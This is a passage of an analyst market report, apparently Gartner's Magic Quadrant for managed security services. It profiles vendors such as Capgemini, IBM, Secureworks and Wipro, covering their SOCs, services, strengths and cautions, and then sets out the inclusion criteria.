  • BT’s efforts to upgrade its portal have resulted in incremental improvements, with further enhancements planned. Customer self-service options in these portals for basic functions, like account management, ticket ownership and management, and interacting with SOC staff, are very limited compared to competitors.
  • BT’s own big data technology and advanced analytics capabilities are currently limited to buyers purchasing its Cyber Security Platform (CSP), which can be delivered as a stand-alone on-premises or hosted solution. BT indicates elements of CSP are on the roadmap to be extended to other BT Security services, such as STM.
  • BT has low visibility with Gartner clients for stand-alone MSS deals. MSSs are commonly bundled with larger networking, cloud services and cybersecurity (e.g., on-premises SOC build-outs) initiatives with BT.

Capgemini

Capgemini, with headquarters in Paris and regional offices located in North America, Europe and the Asia/Pacific region, provides MSS as part of its Cybersecurity Services business. Capgemini delivers services from seven 24/7 SOCs located in India (Mumbai and Bangalore), and regional SOCs in Luxembourg; Toulouse, France; Madrid; and Inverness, Scotland, for customers with data residency and sovereignty requirements. There is one non-24/7 SOC in India. Capgemini provides a variety of MSSs. Log management and security event monitoring are supported via its shared QRadar SIEM solution, with flexible options for dedicated QRadar instances. Support is also available for five other SIEM solutions (Huntsman Enterprise SIEM, Micro Focus ArcSight, McAfee ESM, RSA NetWitness and Splunk), based on customer preference or for customers wanting management of their existing SIEM tool. Customer access to services is via the MSS Portal, which provides a basic dashboard, case management and reporting-oriented interface to the services provided to customers. Capgemini provides a tiered service approach (Bronze, Silver and Gold) to MSS buyers based on the level of services and support required. Additional services include management and monitoring for vulnerability scanners, firewalls, endpoint protection, NIDS/NIPS, web application firewalls (WAFs), CASB, and data loss prevention. Further services are available that cover consulting and advisory, identity and access management, and DDoS, among others.

MSS buyers looking for flexible options for SIEM tools and a wide portfolio of device management and security monitoring services, as well as existing Capgemini customers, should consider Capgemini for MSS.

STRENGTHS
  • Capgemini offers support for a wide variety of SIEM solutions, as well as other security technologies.
  • Capgemini leverages its own threat intelligence network for gathering intelligence to complement third-party commercial sources, which is utilized by its SOC and visible to customers.
  • There is local and regional data residency and sovereignty support for European customers via dedicated local SOCs and data centers.
  • Capgemini offers specific consulting and security monitoring services tailored to customers with ICS/SCADA and IoT environments.
CAUTIONS
  • Capgemini’s portal lags competitors as its focus is on service visibility, management and reporting. Features like log searching and compliance reporting are not yet supported. Capgemini is actively adding enhancements to the portal, and has recently introduced support for multifactor authentication, a chat function with SOC staff and the ability to import vulnerability scanner data.
  • North American and Australian customers requiring that services be delivered domestically should confirm plans for future expansion of SOCs in those regions.
  • Capgemini has limited visibility with Gartner clients for MSS-specific deals. Capgemini’s MSS deals are often included as part of end-to-end cybersecurity outsourcing or digital transformation initiatives.

CenturyLink

CenturyLink is based in Monroe, Louisiana, and has regional offices in Singapore and London. On 1 November 2017, CenturyLink completed the acquisition of Level 3 Communications, expanding its global presence and security service portfolio. CenturyLink provides telecommunications and public and private cloud services, in addition to MSSs. MSS can be acquired as a stand-alone service or as an add-on to other CenturyLink services. With the acquisition of Level 3, CenturyLink now has more than five 24/7 SOCs operating on four continents, including North America, Europe (London), Asia/Pacific (Singapore) and Latin America (Buenos Aires, Argentina, and Sao Paulo, Brazil). There are dedicated North American and U.K. SOCs to support national government contracts. CenturyLink provides a full scope of monitoring and management activities across a broad spectrum of security platforms, including next-gen firewalls, UTM systems, network and host IPS, WAF, VPN, EPP, email and web security, vulnerability scanning, threat intelligence services (from both legacy CenturyLink and Level 3), and advanced threat-oriented capabilities (e.g., network customer traffic analyzed against threat intelligence and advanced analytics for behavioral anomalies). CenturyLink uses a combination of proprietary implementations of big data platforms and other tools (such as from its previous acquisition of Cognilytics) and commercial products to collect, store and analyze customer log data and manage workflow. There are several service tiers available, from basic endpoint security management to advanced threat-oriented capabilities. Incident response, including on-site breach response services, is available with a retainer fee. Some data residency and staff citizenship requirements can be met with in-region SOCs and data storage. The pricing model for MSS depends on the services taken and includes set monthly recurring or usage-based fees; for example, threat monitoring is based on GB-per-day data.

Existing network services, infrastructure as a service (IaaS) and cloud service customers, as well as organizations with global service requirements, should consider CenturyLink for MSSs.

STRENGTHS
  • The MSS portal, which continues to see ongoing enhancements, provides fine-grained role mapping and access for users, and provides easy-to-use report creation and customization features.
  • CenturyLink offers several options for storing customer log data ranging from customer premises to regional CenturyLink data centers to commercial or CenturyLink cloud infrastructure.
  • CenturyLink’s expansion of its global SOC presence, which also increased with the acquisition of Level 3, now offers customers a local presence in four continents.
  • Customers give CenturyLink good marks for the ability to detect threats, and would generally recommend the service to other buyers.
CAUTIONS
  • All managed services are available across the globe, except for services leveraging EDR and endpoint forensic tools, which may be limited to specific tools depending on the customer’s geography. Advanced threat detection and forensics capability based on packet capture and analysis is not yet available, but is planned for 2018. Organizations seeking support for these tools, particularly use of EDR tools outside of the U.S., should validate timing and support availability with CenturyLink.
  • CenturyLink has made enhancements to its portal over the last 12 months, but the portal still has limited features for capturing and using assets and their business value, and does not currently support integrations to enable managing vulnerability scans or viewing scan results.
  • CenturyLink has low visibility with Gartner clients for stand-alone MSS deals. CenturyLink’s current focus is selling MSSs to existing enterprise customers, although it does sell discrete MSSs to non-CenturyLink customers.

DXC Technology

DXC Technology, a newly formed entity as the result of the merger of CSC and Hewlett Packard Enterprise’s (HPE’s) Enterprise Services business, is headquartered in Tysons, Virginia. The merger formally concluded in March 2017. The vendor has 16 SOCs across the Americas, EMEA and the Asia/Pacific region. DXC offers a range of security implementation and consulting services other than MSSs for enterprise and government customers. In addition to security monitoring and device management, DXC does offer additional standard managed services like managed SIEM, managed EDR, vulnerability assessment and DDoS protection, among others. The vendor differs from many other MSSPs in that it offers a range of managed services around identity and access management, such as Identity Management as a Service and Privileged Account Management. As an MSS provider, DXC is currently in a state of consolidation and change, in terms of both the technology platforms used for MSS delivery and new services that the provider is planning to introduce.

Customers requiring globally delivered MSS, especially those looking for a partner that also offers additional IT and security services, should consider DXC for MSSs.

STRENGTHS
  • DXC has a large revenue and incumbent base of security service customers, and has the ability to support large enterprise engagements across geographies.
  • DXC has a large partner network for security technologies and a strong portfolio of supported technologies, in addition to an extensive set of security-related service offerings.
  • DXC can support customers with hybrid cloud environments that require security monitoring and management services.
CAUTIONS
  • Following the merger of HPE’s Enterprise Services business and CSC, DXC still continues to support two separate portals for its MSS customers. Several key portal elements are in a basic stage or still in the process of being introduced to the customer portals (asset management, multilanguage support, reporting, etc.). Log storage and search capabilities using big data technologies are currently being deployed globally.
  • Due to the merger, DXC has 16 SOCs across the world today, with a stated intention to consolidate SOCs located within the same local areas. Customers and prospects should carefully investigate the impact of this planned consolidation on the delivery of their service.
  • DXC, particularly as a new brand, rarely shows up on Gartner client shortlists for pure-play MSS deals.

Fujitsu

Fujitsu is headquartered in Tokyo, with key offices in London; Munich; Lisbon; Richardson, Texas; and Sunnyvale, California. Fujitsu has a large operational presence in Europe and Japan, with 24/7 SOCs in Japan (nine total), Australia, Singapore, India, Germany, the U.K., Finland and the U.S. Fujitsu’s security portal is primarily based on its underlying delivery platform, which is built on LogRhythm’s SIEM solution. Fujitsu has an in-house Cyber Threat Intelligence (CTI) capability, which leverages a range of commercial and open-source feeds and partnerships with third parties, that underpins the threat analytics and detection capabilities within its MSSs. The CTI capability is also delivered as a stand-alone offering. Incident response support and consultancy are available on a retainer basis. Advanced threat detection capabilities for endpoints and networks, as well as sandboxing, leverage technology from partners such as FireEye, Check Point Software Technologies, McAfee, Symantec and others. Malware analysis is available on a range of commercial and open-source toolsets, and forensic analysis is delivered via Fujitsu consulting and partners as needed.

Buyers, including existing Fujitsu IT services customers, should consider Fujitsu for MSSs if they are looking for a provider that offers flexibility for service delivery, or if they already have IT services that can be easily integrated and would benefit from security enhancements.

STRENGTHS
  • Fujitsu provides managed services across a wide portfolio of technologies, including firewalls, UTM, endpoint protection and encryption, IDS/IPS, WAFs, VPN and remote access services, email security, data loss prevention, and identity and access management, in addition to its CTI, threat analytics and advanced threat detection offerings.
  • Fujitsu’s reach in the Asia/Pacific region and Europe is strong.
  • Fujitsu leverages leading SIEM technologies to deliver its security event monitoring and threat analytics and detection capabilities.
CAUTIONS
  • Fujitsu’s technology integrations, partnerships and service delivery methodology for MSS are less mature than those of competing vendors.
  • Fujitsu’s security portal is based purely on access to its LogRhythm platform. Service management functionality, including ticket management, customer communications and management dashboards, lags behind competitors.
  • Fujitsu has very low visibility with Gartner clients looking for discrete MSSs.

HCL Technologies

HCL Technologies is a global IT services provider that offers a range of IT and security services aimed at buyers, primarily through broad-scope IT outsourcing engagements. HCL is headquartered in Noida, India (with regional headquarters in London and Sunnyvale, California). MSS is a part of HCL’s Cybersecurity and GRC services provided via six 24/7 MSS SOCs worldwide (four in India, and one each in Europe and the U.S.). MSS is delivered using commercially available SIEM technologies (IBM QRadar, Micro Focus ArcSight, RSA NetWitness and Splunk), chosen in consultation with the customer. SIEM solutions are leveraged for log collection and management, and real-time security event monitoring and analysis. HCL also offers dedicated managed SIEM options. The vendor provides managed EDR, with multiple technology options available to customers, in addition to threat hunting services. SecIntAl is HCL’s branding for its big-data-based security analytics and threat intelligence capability that underpins the analytics for its threat monitoring services.

HCL’s portal provides a single dashboard-oriented interface across all supported SIEM tools, vulnerability management, endpoint management and CMDB services. Dedicated views in the portal support both analysts and leader personas. HCL supports a variety of third-party security technologies. In addition to firewalls, IDPSs and secure web gateways (SWGs), it also supports a variety of solutions like EDR, CASB, network traffic analysis (NTA) and vulnerability management. Related services, like incident and breach response, are provided by select partners.

Organizations engaged in IT outsourcing and technology transformation projects, buyers looking for providers to use their preferred SIEM tool and broad-based support for security technologies, and existing HCL Technologies customers should consider HCL for MSSs.

STRENGTHS
  • MSS customers can leverage HCL’s support for security technologies across a wide range of markets for product procurement, implementation and management. HCL’s MSS delivery approach is customizable to customers’ requirements and existing security technology solutions.
  • HCL offers considerable flexibility for buyers with broad and complex security monitoring and management requirements across on-premises, SaaS, IaaS and PaaS environments.
  • Customers generally give HCL above-average marks across acquisition, implementation and overall services.
CAUTIONS
  • HCL Technologies’ portal is focused mainly on service visibility through predefined dashboards and reports. Search functionality has been enhanced in the last 12 months, but is limited to 30 days of online data by default.
  • Customers looking for a turnkey security event monitoring service leveraging a shared delivery platform (e.g., no preference for an SIEM solution or bringing their own SIEM tool) should confirm with the vendor which SIEM solution will be used for the service and whether it meets buyers’ requirements and supports existing technologies (security and IT log event sources).
  • HCL Technologies is rarely mentioned in Gartner client inquiries for discrete MSSs as most HCL customers procure MSSs in conjunction with other outsourcing initiatives.

IBM

IBM is headquartered in Armonk, New York, with MSS offices in the U.S. (Atlanta and Cambridge, Massachusetts); London; Brussels; and Hortolandia, Brazil. IBM offers a broad range of MSSs, security consulting and incident response, either as stand-alone offerings or as part of larger IT services and outsourcing engagements. MSSs are delivered from five 24/7 SOCs, called X-Force Command Centers: one in the U.S.; one in San Jose, Costa Rica; one in Hortolandia, Brazil; one in Tokyo and one in Wroclaw, Poland. IBM has three additional non-24/7 SOCs in India, Belgium and the U.S. IBM uses its QRadar SIEM solution to deliver unified monitoring across MSS, regardless of the location of the QRadar platform — shared multitenant, on-premises or as a service. There are four MSS tiers available, ranging from basic endpoint security to highly customized services. IBM’s advanced analytics and targeted attack detection capabilities for the network and hosts include support for customer-deployed products, IBM products (e.g., QRadar modules) and strategic partner solutions (e.g., Carbon Black for IBM Security’s Managed Detection and Response service). Threat intelligence and incident response services, as well as security consulting services, are available. Support for data residency requirements is available through European Commission Model Clauses contract language, local data centers in the customer’s region supported by EU staff out of the Poland SOC, and the use of either on-premises QRadar SIEM or SIEM as a service hosted in IBM Cloud within the region.

Large enterprises with global service delivery requirements looking for flexible security event monitoring technology options, and those with strategic relationships with IBM, should consider IBM for MSSs.

STRENGTHS
  • IBM’s “QRadar Anywhere” approach provides flexible options for IBM QRadar SIEM customers that require managed SIEM options. Customers can migrate from the shared MSS platform to co-managed on-premises or QRadar on Cloud, or vice versa, as strategies evolve.
  • IBM MSS delivery is supported by a range of strong threat intelligence partners, including IBM’s X-Force Security Research, third-party commercial sources and data collected via the vendor’s in-house incident response services.
  • IBM has moderate visibility with Gartner clients considering MSSs. IBM’s visibility is growing for co-managed SIEM opportunities, however, rather than for discrete MSSs.
CAUTIONS
  • Customers report that the IBM sales process is uneven in engaging with them effectively, citing, for example, a lack of responses to RFPs. Customers also report mixed satisfaction with IBM’s delivery of MSS services. Marks are lower than competitors’ in areas like overall service capabilities and overall experience.
  • Buyers should carefully analyze the technology approach recommended to deliver MSSs (e.g., shared or dedicated QRadar, whether on-premises or hosted) to ensure that the approach is compatible with their IT environments, architectures and requirements.
  • IBM offers a managed EDR service that is used for real-time threat detection and threat hunting purposes, but it has little visibility with buyers.

NTT

NTT brings together the MSS-specific resources and delivery platforms of NTT Com Security, Solutionary, Dimension Data, NTT Communications, NTT DATA and technology from the NTT Innovation Institute. NTT Security has been established as the specialized security company of the NTT Group. NTT is headquartered in Tokyo, with regional headquarters for North America, Europe and the Asia/Pacific region. NTT offers a broad range of security professional services, integration services and incident response services. NTT Security has 17 24/7 MSS SOCs globally: six in the Asia/Pacific region, five in Europe and six in North America. In 2017, NTT progressed toward integrating the three separate platforms it uses for delivering MSS. Its new operating model is similar in nature to a channel-based approach, in that NTT Security doesn’t directly sell services, instead relying on its group companies, which have varying levels of coverage and support in the different geographies. NTT is actively migrating North American and Japanese customers to its new Global Managed Security Services Platform (GMSSP), while EMEA and remaining Asia/Pacific region customers continue to use the existing WideAngle and ArcSight ESM-based platforms. NTT Security MSSs are sold via the NTT Group companies of Dimension Data, NTT Communications and NTT DATA.

Customers of NTT operating companies, and enterprises seeking a large global provider, should consider NTT for MSSs.

STRENGTHS
  • NTT can bundle MSS with a wide range of security service offerings and delivery options, including broader telecommunications and IT infrastructure service offerings.
  • NTT has the ability to serve a wide range of industries/verticals across geographies due to the NTT Group companies’ global presence.
  • The new NTT Security portal (GMSSP) has a good range of roles available, with some customization and self-service capabilities available to customers. Integrations with NTT Group companies and customers to the GMSSP are supported via a RESTful API.
  • NTT has moderate visibility with Gartner clients looking for discrete MSSs.
CAUTIONS
  • NTT Security has moved its security sales team to the NTT Group companies while the delivery of the service happens through NTT Security, which is a separate group. This may create misalignment between the sales/marketing and product management/engineering functions, and may create confusion for customers that wish to purchase MSS from NTT Security.
  • Many of NTT’s EMEA and Asia/Pacific region customers are still on their older portals and delivery platforms. MSS customers should get clarity from their NTT Group company provider regarding plans to migrate to the new portal without affecting service continuity and while maintaining service features.
  • While there is a managed EDR offering with Carbon Black, FireEye and CounterTack, NTT is behind some of its competitors in introducing advanced threat-detection-oriented services such as threat hunting and network monitoring.

Orange Business Services

Orange Business Services (Orange), headquartered in Paris and with regional offices in a wide variety of locations across the Asia/Pacific region, North America and Europe, offers a broad range of telecommunications and cloud-based IT infrastructure services, security consulting services, and MSSs. Orange’s MSSs are delivered using commercial and proprietary technologies for log management, event correlation and advanced threat detection, as well as some wider integrations with open-source big data technologies. Security Event Intelligence is the service offering for 24/7 threat detection and response. Threat intelligence is centered around malicious IP addresses, URLs and domain names curated by Orange and collected from a large number of public and private feeds and sources, discoveries made on the Orange Internet backbone, and intelligence from Orange’s in-house CERT team. Services are delivered from seven SOCs (three located in Europe, one in India, one in Malaysia, and one each in Mauritius and Egypt). All SOCs are 24/7 except for the European and Malaysia SOCs, which use a “follow the sun” model. Data residency requirements are addressed on a case-by-case basis, with the majority of non-European clients being serviced from the India and Egypt SOCs.

Orange’s network and infrastructure service customers and multinational organizations, especially those with a European and Asia/Pacific business focus, seeking network-security-focused MSSs should consider Orange Business Services.

STRENGTHS
  • Orange is experienced in integrating and operating global networking and IT services with MSS.
  • Security device management services are a strong focus for the vendor.
  • Orange has a good understanding of regulatory frameworks around data privacy and residency, and caters to many different standards, especially in the European region, with a focus on France.
  • Orange customers give above-average marks for vendor and service capability satisfaction.
CAUTIONS
  • The Orange MSS portal has less self-service functionality and usability than many of its competitors, and lags behind in granular user access and control, and reporting abilities. Orange has added enhanced portal functionality over the past 12 months, focusing on search and visualization capabilities.
  • Orange has less mature capabilities in providing advanced attack analytics as part of its MSS, with a focus on sandboxing and malware analysis rather than network- or endpoint-based detection approaches.
  • Orange has limited market visibility with Gartner clients for discrete MSSs.

Secureworks

Secureworks offers a range of MSSs and other security-specific services to customers globally. Corporate headquarters are located in Atlanta, with offices in London, Edinburgh, Sydney and Tokyo. Services are delivered from three 24/7 SOCs in the U.S. (Atlanta; Chicago; and Providence, Rhode Island); one 24/7 SOC in Edinburgh, Scotland; and one 24/7 SOC in Kawasaki, Japan. The SOCs are supported by a center of excellence in Romania that is focused on customer device management and new service innovation. MSS delivery is through Secureworks’ proprietary Counter Threat Appliance (CTA) and Counter Threat Platform (CTP), which leverages a shared big data platform and advanced analytics capabilities. Customer access to services is via the Secureworks Client Portal. A range of commercial log sources from customer-deployed technologies are supported, in addition to leveraging commercial and proprietary tools for managed network and host-based threat monitoring. Host- and network-based advanced threat detection are provided through Secureworks’ Advanced Endpoint Threat Detection (AETD) service (via its proprietary Red Cloak agent or Carbon Black) and its Advanced Malware Protection and Detection (AMPD; in partnership with Lastline) service. The Secureworks Counter Threat Unit research team provides threat research and threat intelligence, malware analysis, and analytics support to the provider’s SOCs. Additional services, such as vulnerability scanning (either customer- or Secureworks-managed) and advanced threat intelligence services, are also available to buyers.

Midsize, enterprise and government organizations seeking an established MSS that leverages a consistent, shared delivery approach with a global presence, and a security-focused set of offerings, should consider Secureworks.

STRENGTHS
  • Advanced threat detection services are available for endpoint, whether leveraging the proprietary Red Cloak agent or Carbon Black, via the AETD service, which includes the ability to isolate hosts (either by the customer or by Secureworks’ SOC). Customers leveraging Secureworks iSensor in IPS mode, or via Secureworks managed firewalls, can self-initiate blocking for threats detected by the SOC.
  • Native support for IaaS monitoring in AWS and Azure is available, and includes capabilities for network and web app vulnerability management, which supports buyers requiring visibility and security monitoring in public cloud environments.
  • Secureworks offers an incident response retainer that is popular with buyers, which provides proactive as well as remote and on-site reactive response services.
  • Secureworks is highly visible with Gartner clients, and is frequently included in competitive MSS deals by North America-based midsize and enterprise buyers. It also has good visibility with U.K. buyers.
  • Gartner customers give positive feedback for Secureworks’ MSS offerings.
CAUTIONS
  • Secureworks lacks visibility with buyers in continental Europe and the Asia/Pacific region for MSSs.
  • Customers requiring raw event log retention beyond 90 days (e.g., for compliance reporting and incident investigation purposes) can opt for Secureworks’ on-premises log management offering (LogVault).
  • Monitoring for Office 365 and Salesforce is supported, but support for other popular SaaS solutions like Box, Dropbox and Workday is not yet available. There is no CASB option available.
  • Basic response services are available to AETD and device management customers, but other response services like forensics support, including malware analysis and threat hunting, require adding premium services.

Symantec

Symantec is headquartered in Mountain View, California, and has six SOCs: one each in the U.S., the U.K. and Japan, and three in the Asia/Pacific region (India, Australia and Singapore). The SOCs operate on a follow-the-sun model to provide 24/7 support. Customers are assigned to a primary SOC in their region along with a global team of analysts aligned to their specific industry vertical. Symantec’s Cyber Security Services offerings comprise security monitoring and management (including hosted log retention), security intelligence, incident response services and security skills development services. Symantec has a broad portfolio of security technology solutions. Recent acquisitions include Outlier Security (EDR), Skycure (mobile device protection) and Fireglass (isolation technology). Symantec’s MSS SOC technology platform is based on self-developed technology. Customer event and log data are analyzed by Symantec’s global SOCs and retained in the North American data center. Symantec meets data residency requirements through contractual arrangements and the EU Standard Model Clause. Symantec MSS supports advanced threat detection via integrations with its own solutions as well as third-party products for network monitoring and forensics capabilities, and for payload analysis. MSS monitoring of EDR and forensics tools is offered for Symantec and third-party products. Incident and breach response services are available on retainer or on an ad hoc basis to buyers looking for a single provider for MSSs and response services. Monitoring capabilities are available for popular SaaS, IaaS and public cloud services. Pricing for MSS is offered in two models: based on a per-device/event source cost, or on an enterprisewide license that provides unlimited monitoring up to a set limit of event sources (aka nodes).

Enterprises seeking an established MSSP with a global presence should consider Symantec.

STRENGTHS
  • Symantec has a well-established threat intelligence capability via its DeepSight services.
  • Symantec’s MSS portal offers granular role definitions and strong support for tracking and managing incident workflow.
  • The enterprisewide pricing model offers larger customers flexibility in bringing security event sources into scope for monitoring, and avoids change orders to add event sources beneath the agreed-on total for monitoring.
  • MSS customers indicate that Symantec is effective in detecting and helping to respond to advanced threats and targeted attacks.
  • Symantec has good visibility for MSS among Gartner customers.
CAUTIONS
  • Symantec now focuses primarily on security monitoring and directly offers only limited device management services, mainly for IDPS and not for other security controls. Prospective customers seeking device management services in addition to monitoring must anticipate working with Symantec partners.
  • Current integrations with vulnerability scanning products do not enable MSS customers to schedule or run scans via Symantec’s MSS portal. Customers can view scan results in the portal.
  • Symantec’s MDR-type advanced threat detection offerings, one network-based and the other host-based, are in the limited pilot/early adopter phase. Buyers interested in using one of these services will need to validate when they are available in their geography.

Trustwave

Trustwave, a stand-alone business within Singtel Group Enterprise, is based in Chicago, with regional headquarters in London, Sao Paulo and Sydney. Trustwave has several partnerships with regional telecommunications and service providers (e.g., Rogers Communications in Canada, Optus in Australia, Globe Telecom in the Philippines and TIS in Japan) around the globe to provide MSSs to those partners’ customer bases. Trustwave has nine 24/7 SOCs around the globe — three in North America, two in Europe (Warsaw and London), and four in the Asia/Pacific region (Manila, Philippines; Singapore; Sydney; and Tokyo). In the case of its telecom partners, the 24/7 SOCs are operated by Trustwave, some of which are in colocated facilities with the partners. Trustwave has a large portfolio of security technologies — including SIEM, UTM, network access control, application security, WAF and anti-malware — and builds MSSs around those, as well as support for a variety of third-party security products. Threat intelligence and incident response services are provided in-house from the Trustwave SpiderLabs team. Trustwave offers a managed EDR service leveraging Carbon Black and CounterTack as partners. Midmarket and small enterprise organizations, especially those with PCI DSS compliance requirements, make up the majority of Trustwave customers; however, the vendor has increased its focus on large enterprise buyers.

Telecommunications customers that have formed strategic partnerships with Trustwave, as well as companies in the retail, hospitality, healthcare and banking vertical industries, should consider Trustwave for MSSs. Trustwave is a good option for customers that need both products and services from a single provider, as the vendor has several competitive security software- and hardware-based platforms.

STRENGTHS
  • Trustwave supports a large client base that spans small and midsize enterprises, as well as larger global organizations.
  • Trustwave has expanded its global footprint through strategic partnerships with communications service providers across the Asia/Pacific region and North America, implementing a customer- and vertical-centric delivery model across the newly established SOCs.
  • The vendor’s SpiderLabs security research, penetration testing and incident response teams provide threat intelligence that enhances the value of the MSSs, both through integration of the threat intelligence data directly into the monitoring workflow and through SpiderLabs analysts serving as a higher tier of skills for advanced triage.
  • Trustwave has moderate visibility with Gartner clients looking to purchase MSSs.
CAUTIONS
  • Trustwave is planning to release an update to its MSS portal. Customers coming on board should ensure that they are getting the new portal, and that they review the rollout plan and features for that portal to ensure that it does not affect their service continuity.
  • As Trustwave continues to add support for third-party security technologies, customers should validate when and to what extent the security products they have deployed will be fully supported by Trustwave MSSs.
  • Office 365 and Salesforce are supported directly via APIs; however, support for other popular SaaS vendors requires the use of a CASB solution. Trustwave claims that support for other SaaS vendors is available via API integrations, but it requires sufficient lead time (up to 45 days) for development and implementation.

Verizon

Verizon is a telecommunications company that offers MSSs and security consulting services. It is headquartered in Basking Ridge, New Jersey, with regional offices in Reading, U.K., and Singapore. Verizon uses a global network of SOCs, with three SOCs in the U.S., four in the Asia/Pacific region (India and Australia), and two in Europe (Luxembourg and Germany). Verizon’s Unified Security Portal (USP) provides single portal access across all services and capabilities for customers. Verizon’s MSS platform includes log management capabilities allowing clients to search, index and store logs using technology based on Elasticsearch. A mix of proprietary and commercial technology, including Splunk, is used to analyze security data, which is ingested via Verizon’s proprietary Log Event Collector (LEC). Verizon uses regional SOCs and data retention to meet requirements for local data storage and analysis. Network Threat Advanced Analytics, which was added as a service in 2017, is available both to customers on the Verizon backbone network and through NetFlow analysis capabilities deployed at a customer’s site. Malware analysis and network and endpoint forensics are available to buyers. Remote and on-site support for incident and breach response is provided via the Threat Intel and Response Service.

Enterprises, including existing Verizon network customers, should consider Verizon if they require well-established global or region-specific MSSs.

STRENGTHS
  • Verizon’s investment in reporting, communications features and data visualization enables clients to fully manage, interpret and investigate their security incidents within Verizon’s Unified Security Portal.
  • Netskope and Cisco Cloudlock, two leading CASB solutions, are currently supported by Verizon. Buyers with SaaS monitoring requirements should confirm support for their preferred CASB vendor.
  • Verizon has moderate visibility with Gartner clients for MSSs.
CAUTIONS
  • Verizon’s pricing model, specifically for the MSS Analytics service, is based on the data volume of log event and other data sources sent per day, measured in GB per day (management of security devices is still priced on a per-device basis). Buyers considering Verizon services should carefully analyze how much event and data volume they currently generate, and may generate, over time, to properly scope the service costs.
  • Vulnerability management in Verizon’s Unified Security Portal lags behind many competing MSSPs. Buyers should validate how Verizon integrates and leverages the data from their preferred vulnerability management solution.
  • Verizon lags behind competitors in its managed EDR service offerings. Leading EPP vendors are supported, but EDR-specific technologies are not yet supported.

Wipro

Wipro provides a variety of MSSs, including security threat monitoring, infrastructure security operations and technology management, vulnerability management, incident response, identity and access management, and security consulting services. Wipro is headquartered in Bangalore, India, with offices in London, New York, New Jersey and elsewhere around the globe. MSSs are delivered from 14 24/7 SOCs, with eight in India (Bangalore, Pune, Chennai, Mysore, Bhubaneswar, Kochi, Noida and Gurgaon), two in Europe (Amsterdam and Meerbusch, Germany), and four in North America (Houston, Dallas, Phoenix and Edmonton, Canada). Wipro offers security event monitoring via its multitenant ServiceNXT platform, or Wipro can support customers that bring their own SIEM solution or require a specific, dedicated SIEM tool. Wipro currently supports six SIEM platforms. Customers access the Wipro MSSs through the Cyber Defense Center (CDC) portal, which provides a single landing page for accessing the services used by customers. Wipro has a broad portfolio of technology partnerships available to buyers. Flexible options are also available to meet local or regional data residency requirements and regulations.

Buyers across Europe, the Americas and the Asia/Pacific region considering MSS as part of broader IT outsourcing activities, and enterprises seeking flexible options for managing a range of security controls, including SIEM tools, across a variety of IT environments, should consider Wipro.

STRENGTHS
  • Wipro makes newer technologies such as EDR, NTA and SOAR available to buyers and customers (as well as for use internally for service delivery where applicable). Wipro made additional strategic investments in 2017 (Demisto) to complement existing investments (Vectra and IntSights). Wipro plans to introduce services leveraging breach and attack simulation, as well as deception solutions, in the future.
  • Wipro has extensive partnerships across a range of security technologies that it can implement and manage, and it can use those tools on behalf of buyers to meet their specific or customized requirements.
  • Wipro’s MSS delivery approach is highly customizable to customers’ requirements and existing technology solutions.
  • Wipro customers report positive feedback for the vendor’s overall services and experience, but the feedback for the onboarding process is less positive.
CAUTIONS
  • Wipro is in the process of moving its primary delivery model to a shared, multitenant platform, instead of leveraging customer-specific SIEM tools as its default delivery model. That transition to the shared model is still a work in progress and delivery models still lean toward per-customer-specified SIEM solutions. Buyers preferring to leverage a shared delivery platform should evaluate the architecture and implementation to ensure that it is fit for their purposes and requirements.
  • Wipro has made many improvements to its CDC portal over the past 12 months toward usability and centralization of access to services, but it still lacks the features available in many competing MSS portals.
  • Wipro has low visibility on Gartner clients’ shortlists for stand-alone MSS deals.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

Capgemini, DXC Technology and Fujitsu were added.

Dropped

CSC and HPE Enterprise Services were dropped, as they merged under DXC Technology.

Inclusion and Exclusion Criteria

As a remote service, MSS can be delivered to and from any location with sufficient connectivity. MSSPs that have operations in one geographic region can support customers in other regions. Gartner sees a distinct preference among customers seeking MSSs to first consider MSSPs with a presence in their country or region (e.g., North America, Europe and the Asia/Pacific region). For global enterprises, that includes a presence in multiple regions where the enterprises operate, in order to provide more local support. Local presence enables the MSSP’s ability to keep some data in specific regions, as well as to provide local business hours and access to advanced support, staffing requirements (such as specific citizenship) and local language support, among other capabilities. In addition, compliance with data residency and privacy regulations can be addressed in many cases with local operations centers.

This Magic Quadrant includes MSSPs that have met thresholds for scale (expressed as devices supported and customers) and presence (SOCs) in multiple regions, as well as a threshold for MSS revenue.

The criteria include a threshold for the number of firewalls or network-based IDPS devices under monitoring or management, and a threshold for the number of MSS customers — both distributed across multiple regions. We note that many providers, in addition to MSSs, offer other service delivery options (such as local staff augmentation) and related services, like building SOCs at a customer’s premises, which may be supported remotely by the MSSP’s SOC. However, these are not evaluated within this research. Also excluded from this analysis are service providers that offer MSSs only as a component of another service offering (such as bandwidth or hosting), and vendors that provide MSSs only for their own technologies, not for third-party technologies.

Inclusion Criteria

Vendors must:

  • Have services to remotely monitor and/or manage firewalls and UTM systems, IDPS devices from multiple vendors via discrete service offerings, and shared-service delivery resources.
  • Have firewalls/IDPS devices under remote management or monitoring for external customers that meet a minimum threshold described below.
  • Have customers, as well as monitored firewalls and IDPS devices, across multiple geographies that meet a minimum threshold described below. The thresholds for customers and devices have increased from the prior Magic Quadrant to reflect market growth.
  • Have MSS revenue of $50 million or more in 2016. The threshold for revenue has increased from the prior Magic Quadrant.
  • Have a SOC presence in multiple geographic regions.
  • Have reference accounts that are relevant to Gartner clients in the appropriate geographic regions.
  • Be service providers that Gartner determines to be significant vendors in the market because of their market presence or service innovation.

Inclusion thresholds for firewalls/IDPS devices under MSSs are 389 in the Asia/Pacific region, 2,473 in Europe, 3,709 in North America and 45 in the rest of the world (ROW). MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Inclusion thresholds for MSS clients are 75 in the Asia/Pacific region, 118 in Europe, 355 in North America and 19 in the ROW. MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Exclusion Criteria

Vendors that have:

  • Service offerings that are available only to end users that buy other non-MSSs
  • Services that monitor or manage only the service provider’s own technology
  • Services delivered by service provider resources dedicated to a single customer
  • Services that fail to meet the inclusion criteria

Evaluation Criteria

Ability to Execute

